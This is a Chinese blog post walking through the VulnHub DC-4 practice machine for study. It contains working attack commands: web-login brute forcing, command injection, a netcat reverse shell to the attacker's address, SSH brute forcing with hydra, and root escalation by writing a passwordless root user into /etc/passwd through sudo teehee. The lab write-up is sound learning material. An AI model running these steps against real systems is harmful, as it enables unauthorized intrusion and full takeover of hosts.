渗透测试学习之DC-4

最新推荐文章于 2024-10-09 23:31:03 发布
最新推荐文章于 2024-10-09 23:31:03 发布
阅读量588 收藏
点赞数
文章标签: 学习
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_43353413/article/details/124728818
版权

该文章为本人学习DC-4靶机记录

首先部署靶机:下载地址 DC: 4 ~ VulnHub

步骤为直接下载解压,本文直接省略跳过:

主机发现以及信息搜集

nmap -sS 192.168.88.0/24

 

扫描具体信息

nmap -A -v 192.168.88.137

访问80端口的网站

可以看出该网站的账号大概率为Admin或者admin

尝试使用burpsuite爆破一下

然后设置好字典

 

开始爆破,将结果排序一下,可以看出账号为admin,密码happy

登录网站

 

点击command

 

 

看一下bp抓到的包,可以发现可以修改radio的参数来改变命令

首先看看flag,去home目录

似乎不可以直接去,尝试一下getshell

 

 

 

 尝试一下写入一句话木马脚本,似乎被过滤掉了

尝试直接使用shell反弹,我看剑很多人用加号代替空格,其实直接使用空格也可以

 payload:nc -nv 192.168.88.129 6666 -e /bin/bash

 

 使用交互式界面

python -c "import pty; pty.spawn('/bin/bash')"

 查看flag可以知道提示去home的目录看一下,可以看见jim有一个旧的密码本

 

 尝试ssh爆破

hydra -l jim -P pass2.txt ssh://192.168.88.137

爆出成功,使用ssh远程登陆一下,一登陆发现最后一句话 you have mail

ssh jim@192.168.88.137

去/var/mail查看jim的邮件

 切换到chales角色

 

 sudo -l 发现有teehee权限

 尝试网上大佬的teehee提权方式,在passwd文件里写入一个无密码的新用户

echo "jl::0:0:::/bin/bash" | sudo teehee -a /etc/passwd

 然后就是和其他的靶机一样到root目录找flag

 

Crane_jjk
关注
DC-4-Web渗透测试靶机
01-19
DC-4-Web渗透测试靶机】是一个专门为网络安全专业人士设计的模拟环境,主要用于学习和实践Web渗透测试技术。在Web渗透测试中,目标是识别并利用网站应用程序的安全漏洞,以便于预防或修复这些漏洞,保护真实的网络...
Vulnhub靶机:DC-4渗透详细过程
IerkeU的博客
02-28 1946
基本步骤 前言提要: 靶场地址:DC: 4 ~ VulnHub DC-4是一个初中级的靶场,需要具备以下前置知识: 基础的Linux命令及操作 基础的渗透测试工具使用(Kali / Parrot下的工具) 这次练习的靶机是vulnhub平台下的DC系列靶机第四台,该靶机的难度系数为简单,拿下该靶机的关键就是需要收集信息,最终目的是获取root权限,拿到flag。 步骤: 信息收集 nmap 192.168.132.0/24 目标靶机ip:192.168.132.150 全面扫描 n
DC-4 渗透测试
Darklord.W
04-14 1278
DC-4渗透测试 0x00实验环境 靶机:DC-4,IP地址:192.168.8.135 测试机:Kali,IP地址:192.168.8.128; 0x01实验流程 信息收集——主机发现、端口扫描 渗透测试 0x02实验步骤 主机发现 Masscan以及nmap扫描 访问web端 扫描web目录 但是没有什么有价值的内容 尝试暴力破解 得到admin...
linux系统 /var 目录下各个部分的功能
热门推荐
DongZhaoCheng
05-05 1万+
/var目录下各个部分的功能 /var目录主要存放的是一些经常变动的文件,如缓存文件、日志文件、程序运行时产生的文件等 /var/cache:应用程序运行过程中产生的一些缓存 /var/lib:存放程序执行过程中使用到的一些数据文件、在该目录下各个软件有各自的目录 /var/lock:某些资源或设备同一时刻只能被一个程序使用或访问,因此在一个程序使用的时候,就为该资源上锁(lock),以防止被其他程序使用,该目录就放置这些相关信息 /var/log:系统中各种日志文件存放的目录 /var/mail:.
DC系列(4)DC-4靶机渗透
Nikris的博客
01-11 954
DC-4
DC_4 靶场夺旗
猎荒者
02-22 400
兵无常势,水无常形,能因敌而致胜者,谓之神 环境准备 VMware Workstation Pro12 Kali Linux (IP:10.10.16.128) DC_4 虚拟机 NAT 网络连接 1. 主机发现 方法一:fping -asg 10.10.16.0/24 方法二:nmap -sP 10.10.16.0/24 2. 端口扫描 nmap -A -v -sS -sV -p- ...
DC-4靶机提权超详细过程
02-29
通过对DC-4靶机的权限提升过程的学习,我们不仅掌握了基本的渗透测试技巧,还深入了解了如何利用各种工具和技术来进行高效的信息搜集和权限提升。这对于从事网络安全行业的人员来说是非常宝贵的经验积累。在未来的...
DC3靶机渗透测试练习
10-05
DC3靶机渗透测试练习中,我们学习了如何使用 MSF 来利用 Joomla 框架的漏洞。 在 MSF 利用漏洞阶段,我们学习了如何启动 MSF,如何选择合适的漏洞利用模块,如何配置漏洞利用参数等。我们还学习了如何使用 MSF ...
WEB渗透测试数据库(实用).zip
06-29
本项目仅供学习交流,请勿使用本项目进行任何未经授权的渗透测试。 1.1 辅助工具 提供轻量级的易扩展的工具,可以快速编写exploit、添加漏洞验证/扫描规则、添加指纹规则、爆破规则等;包含以下功能: Exploit系统...
内网渗透讲义-精选.zip
09-24
- 网络安全从业人员,特别是内网渗透测试工程师 - 安全研究人员,学习和研究内网渗透技术 - 企业IT安全管理员,增强内部网络的防御和安全检测能力 - 网络攻防爱好者,了解内网渗透的工具和技术 使用场景: - 企业...
DC-4靶机练习
千寻的博客
01-02 3105
DC-4靶机练习 第一步 扫描主机 [nmap -sP 192.168.139.0/24] 第二步 扫描端口 [nmap -A 192.168.139.147 -p 1-65535] 第三步 访问80网页 第四步 尝试使用burp获取账号和密码 Kali的浏览器中安装插件 proxy switch 打开burpon 打开抓包 [cat /usr/share/john/password.l...
springboot实战学习(12)(优化更新用户基本信息接口)(Validation实体参数校验)
岁岁岁平安的博客
10-09 658
本篇博客主要是对用户模块的更新用户基本信息接口的代码的一个小优化(实体参数校验)。其中用到了Spring Validation参数校验框架提供的一些注解(如@NotNull、@NotEmpty、@Email、@Validated)去完成实体类对象的参数校验以及完成了功能的测试...
学习记录:js算法(四十九):二叉树的层序遍历
weixin_48677331的博客
10-01 434
任重而道远!
10.2学习
2401_87363162的博客
10-02 1176
​ Spring AOP就是基于动态代理的,如果要代理的对象,实现了某个接⼝,那么Spring AOP会使⽤JDKProxy,去创建代理对象,⽽对于没有实现接⼝的对象,就⽆法使⽤ JDK Proxy 去进⾏代理了,这时候Spring AOP会使⽤基于asm框架字节流的Cglib动态代理 ,这时候Spring AOP会使⽤ Cglib ⽣成⼀个被代理对象的⼦类来作为代理。每个线程中都有一个自己的ThreadLocalMap类对象,可以将线程自己的对象保持到其中,各管各的,线程可以正确的访问到自己的对象。
jmeter学习(7)beanshell
daxiashangxian的博客
10-06 365
打开日志选项,beanshell的log可以在日志中查看log.info("deviceId")举例:获取返回数据中的字段。
HAL+M4学习记录_3
dabuding666的博客
10-09 360
记录了HAL库开发GPIO点亮LED
关于懒惰学习与渴求学习的一份介绍
2301_79096986的博客
10-04 1206
在这篇文章中,我将介绍些懒惰学习与渴求学习的算法例子,会介绍其概念、优缺点以及其python的运用。
JAVA Web(学习笔记)
最新发布
m0_74728220的博客
10-09 717
客户端在发送一个请求时,一般而言都会携带一些数据(例如URL中的参数、页面中的表单、Ajax提交的参数等),当一个Servlet接收到这些请求时,Java Servlet中的类通过所提供的方法就能得到这些参数,也正是这个原因,Servlet可以对发送请求起到拦截作用,它在某些请求前先做一个预处理分析,从而判断客户端是否可以做某些请求,当Servlet具有如上功能时,一般称之为拦截器。Servlet起到这个中间角色的功能,协调各组件、各部分完成相应的功能,根据不同的请求做出相应的响应并显示结果。
Go基础学习10-原子并发包sync.atomic的使用:CSA、Swap、atomic.Value......
FLJS_T的博客
10-02 1129
原子操作sync.atomic以及原子变量atomic.Value详细介绍。go中原生的支持原子操作的函数支持的变量类型int32、int64、uint32、uint64、uintptr,以及unsafe包中的Pointer。对于上述原子操作类型中的每一个,可以支持的数据类型有:==int32、int64、uint32、uint64、uintptr,以及unsafe包中的Pointer。但是否sync.Mutex变量能够保证操作的原子性。atomic.Value类型是开箱即用的,我们声明一个该类型的变量
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值